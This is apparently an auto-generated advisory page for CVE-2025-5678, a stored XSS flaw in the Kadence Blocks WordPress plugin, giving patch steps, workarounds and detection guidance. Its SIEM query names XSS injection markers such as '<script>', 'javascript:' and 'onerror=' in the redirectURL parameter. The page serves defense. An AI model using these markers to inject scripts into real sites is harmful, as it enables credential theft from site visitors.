CVE-2025-5678 – This stored XSS vulnerability in the Kadence Bl... (How to Fix)

Q: What is the severity of CVE-2025-5678?

CVE-2025-5678 has a CVSS score of 6.4 (MEDIUM). This stored XSS vulnerability in the Kadence Blocks WordPress plugin allows authenticated attackers with Contributor access or higher to inject malicious scripts via the 'redirectURL' parameter. The scripts execute when users visit compromised pages, potentially stealing credentials or performing unauthorized actions. All WordPress sites using vulnerable plugin versions are affected.

📋 TL;DR

This stored XSS vulnerability in the Kadence Blocks WordPress plugin allows authenticated attackers with Contributor access or higher to inject malicious scripts via the 'redirectURL' parameter. The scripts execute when users visit compromised pages, potentially stealing credentials or performing unauthorized actions. All WordPress sites using vulnerable plugin versions are affected.

💻 Affected Systems

Products:

Gutenberg Blocks with AI by Kadence WP – Page Builder Features

Versions: All versions up to and including 3.5.10

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires WordPress installation with vulnerable plugin and at least one user with Contributor role or higher.

📦 What is this software?

Gutenberg Blocks With Ai by Kadencewp

View all CVEs affecting Gutenberg Blocks With Ai →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, deface websites, redirect users to malicious sites, or install backdoors for persistent access.

🟠

Likely Case

Attackers with contributor accounts inject malicious scripts to steal user session cookies or redirect visitors to phishing pages.

🟢

If Mitigated

With proper input validation and output escaping, the vulnerability would be prevented entirely.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access but is straightforward once attacker has Contributor credentials.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.5.11 or later

Vendor Advisory: https://wordpress.org/plugins/kadence-blocks/#developers

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'Kadence Blocks' and click 'Update Now'. 4. Verify version is 3.5.11 or higher.

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily deactivate Kadence Blocks plugin until patched

wp plugin deactivate kadence-blocks

Restrict user roles

all

Remove Contributor role access or implement strict role-based access control

🧯 If You Can't Patch

Implement web application firewall (WAF) rules to block XSS payloads in redirectURL parameter
Regularly audit user accounts and remove unnecessary Contributor-level access

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Kadence Blocks version. If version is 3.5.10 or lower, system is vulnerable.

Check Version:

wp plugin get kadence-blocks --field=version

Verify Fix Applied:

After update, confirm version is 3.5.11 or higher in WordPress plugins list.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to admin-ajax.php with redirectURL parameter containing script tags
Multiple failed login attempts followed by successful Contributor login

Network Indicators:

Outbound connections to suspicious domains from WordPress server
Unexpected redirects from WordPress pages

SIEM Query:

source="wordpress.log" AND ("redirectURL" AND ("<script>" OR "javascript:" OR "onerror=" OR "onload="))

📊 Metadata

CVE ID: CVE-2025-5678

CVSS v3 Score: 6.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.02% exploit probability (5.2th percentile)

Published: July 9, 2025

Last Updated: July 17, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-5678, you might also want to check these: